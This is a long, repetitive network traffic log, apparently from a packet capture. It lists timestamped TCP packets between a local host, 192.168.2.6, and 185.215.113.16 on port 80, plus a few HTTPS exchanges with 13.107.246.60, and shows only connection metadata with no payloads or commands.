                                                                                                                                                                        Nov 21, 2024 10:37:48.768366098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.769125938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.769182920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.769267082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.770071030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.770114899 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.770205021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.770951986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.771013975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.771100998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.771888018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.771934986 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.771969080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.772871971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.772886038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.772934914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.773744106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.773804903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.773845911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.774678946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.774713993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.774719954 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.775597095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.775655031 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.775770903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.829713106 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.876343966 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.877227068 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.877254963 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.877747059 CET49794443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.877753019 CET4434979413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.922024965 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.922636032 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.922660112 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.923103094 CET49795443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.923111916 CET4434979513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.929416895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.929559946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.929613113 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.929831982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.929945946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.930309057 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.930795908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.930927992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.930979013 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.931714058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.931845903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.931915998 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.932604074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.932682037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.932836056 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.933747053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.933816910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.933866024 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.934465885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.934653997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.934704065 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.935415030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.935616970 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.935707092 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.936286926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.936351061 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.936407089 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.937206030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.937339067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.937410116 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.938138962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.938267946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.938318968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.939104080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.939240932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.939344883 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.939987898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.940076113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.940119982 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.940908909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.941189051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.941252947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.941849947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.941939116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.942002058 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.942745924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.942867994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.942928076 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.943700075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.943819046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.943867922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.944565058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.944703102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.944746017 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.945496082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.945611954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.945651054 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.946440935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.946614027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.946669102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.947359085 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.947436094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.947683096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.948257923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.948388100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.948431015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.949182987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.949310064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.949357033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.950141907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.950273037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.950324059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.951036930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.951169014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.951227903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.951960087 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.952094078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.952145100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.952886105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.953026056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.953099012 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.953811884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.954099894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.954176903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.954765081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.954929113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.954986095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.955658913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.955713034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.955883980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.956584930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.956715107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.956978083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.957487106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.957669020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.957722902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.958467960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.958616018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.958786964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.959366083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.959423065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.959484100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.960314035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.960441113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.960526943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.961170912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.961287022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.961409092 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.962111950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.962202072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.962404013 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.963046074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.963139057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.963210106 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.963979959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.964087963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.964134932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.964957952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.965048075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.965101957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.965806961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.965919971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.966137886 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.966768026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.966851950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.966902018 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.967627048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.967693090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.967765093 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.968570948 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.968625069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.968740940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.969486952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.969664097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.969715118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.970432997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.970733881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.970782995 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.971354008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.971539974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.971685886 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.972280025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.972316980 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.972362995 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.973197937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.973370075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.973480940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.974104881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.974283934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.974330902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.974992037 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.975087881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.975142956 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.975933075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.976083040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.976130962 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.976875067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.976927996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.976984978 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.977740049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.030524015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.054964066 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.055450916 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.055469990 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.055883884 CET49796443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:49.055888891 CET4434979613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.131295919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.131319046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.131331921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.131345034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.131401062 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.131427050 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.132343054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.132359028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.132416010 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.132771969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.132909060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.133399963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.133569956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.133738995 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.134541988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.134582043 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.134708881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.135438919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.135459900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.135479927 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.135492086 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.136343002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.136485100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.136523008 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.137229919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.137367010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.137413025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.138246059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.138344049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.138380051 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.139112949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.139219046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.139420986 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.140064955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.140207052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.140245914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.140979052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.141105890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.141145945 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.141899109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.142035961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.142085075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.142828941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.142985106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.143027067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.143853903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.143899918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.143940926 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.144623041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.144754887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.144798040 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.145601034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.145678997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.145720959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.146516085 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.146729946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.146775961 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.147486925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.147521973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.147559881 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.148581982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.148655891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.148694992 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.149601936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.149657011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.149776936 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.150247097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.150418043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.150633097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.151097059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.151326895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.151371002 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.152158022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.152237892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.152328014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.152951002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.153043985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.153090000 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.153856993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.153929949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.153975010 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.154776096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.154896021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.154937983 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.155694008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.155811071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.155853033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.156636953 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.156733990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:49.156775951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.157033920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:49.157552958 CET8049787185.215.113.16192.168.2.6
